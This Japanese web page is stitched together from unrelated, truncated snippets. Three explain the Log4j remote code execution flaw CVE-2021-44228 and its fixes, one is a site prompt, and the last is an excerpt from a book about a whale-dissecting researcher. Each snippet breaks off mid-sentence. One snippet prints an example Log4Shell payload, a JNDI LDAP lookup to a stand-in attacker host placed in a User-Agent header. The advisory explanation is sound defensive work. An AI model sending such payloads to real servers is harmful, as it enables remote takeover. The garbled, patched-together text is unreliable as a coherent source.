オープンソースのロギングライブラリとしてさまざまなJavaアプリケーションに使われている「Apache Log4j」に、任意のリモートコードが実行できてしまう脆弱性が発見されました（CVE - CVE-2021-44228）。 これが悪用されると、第三者が勝手にサーバを操作して悪意のあるソフトウェアを組み込んだり、悪意のある攻撃を行う際の踏み台にされるなどのさまざまな攻撃が行われます。 すでに脆弱性の存在は広く知れ渡っているため、脆弱性のあるLog4jを使っているシステムはいつでも攻撃を受ける可能性があるのです。 この脆弱性は広範囲な影響が予想されており、多くの専門家が非常に深刻な状況として捉えています。 できるだけ速やかに、JavaアプリケーションにおけるLog4jの利用の確認と対策が必要です。 Javaアプリケーションに明示的にLog4jを組み込んでいない場合も、例えばStrutsやR

サインインした状態で「いいね」を押すと、マイページの 「いいね履歴」に一覧として保存されていくので、 再度読みたくなった時や、あとでじっくり読みたいときに便利です。

JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNS や LDAP 等のサービスを利用するための汎用的なインタフェース (ライブラリ) です。 Log4j と JNDI lookupApache Software Foundation が開発した、Java ベースのロギングに関するライブラリです。JNDI lookup という機能があり、書き込んだログの一部を自動で変数化します。今回はこの機能が悪用されています。 CVE-2021-44228 の攻撃シーケンスの例 攻撃者は脆弱性をトリガーするために http ヘッダの User-Agent に ${jndi:ldap://attacker.com/a} という文字列を埋め込み、http リクエストを送信します。脆弱性のあるサーバの Java App はその通信を

2021年12月10日、Javaベースのログ出力ライブラリ「Apache Log4j」の2.x系バージョン（以降はLog4j2と記載）で確認された深刻な脆弱性を修正したバージョンが公開されました。セキュリティ関係組織では過去話題になったHeartbleedやShellshockと同レベルの脆弱性とも評価しています。ここでは関連する情報をまとめます。 １．何が起きたの？ Javaベースのログ出力ライブラリLog4j2で深刻な脆弱性（CVE-2021-44228）を修正したバージョンが公開された。その後も修正が不完全であったことなどを理由に2件の脆弱性が修正された。 広く利用されているライブラリであるため影響を受ける対象が多く存在するとみられ、攻撃が容易であることから2014年のHeartbleed、Shellshock以来の危険性があるとみる向きもあり、The Apache Software

日本一クジラを解剖してきた研究者・田島木綿子さんの初の著書『海獣学者、クジラを解剖する。～海の哺乳類の死体が教えてくれること』は、海獣学者として世界中を飛び回って解剖調査を行い、国立科学博物館の研究員として標本作製に励む七転八倒の日々と、クジラやイルカ、アザラシやジュゴンなど海の哺乳類たちの驚きの生態と工夫を凝らした生き方を紹介する一冊。発売たちまち重版で好評の本書から、内容の一部を公開します。第23回はとある「レジェンド」スタッフについて。 博物館に非常勤スタッフとして通い始めてから、博物館の中ではさまざまな人が、本当にさまざまな仕事をしていることを知った。普段、一般の方たちが博物館で見かけるスタッフは、展示室の入口にいる受付の人や展示会場で解説してくれる人たちではないだろうか。 しかし、その奥の部屋や研究施設には、多くの人がさまざまな仕事を担って働いている。展示物に勝るとも劣らない魅力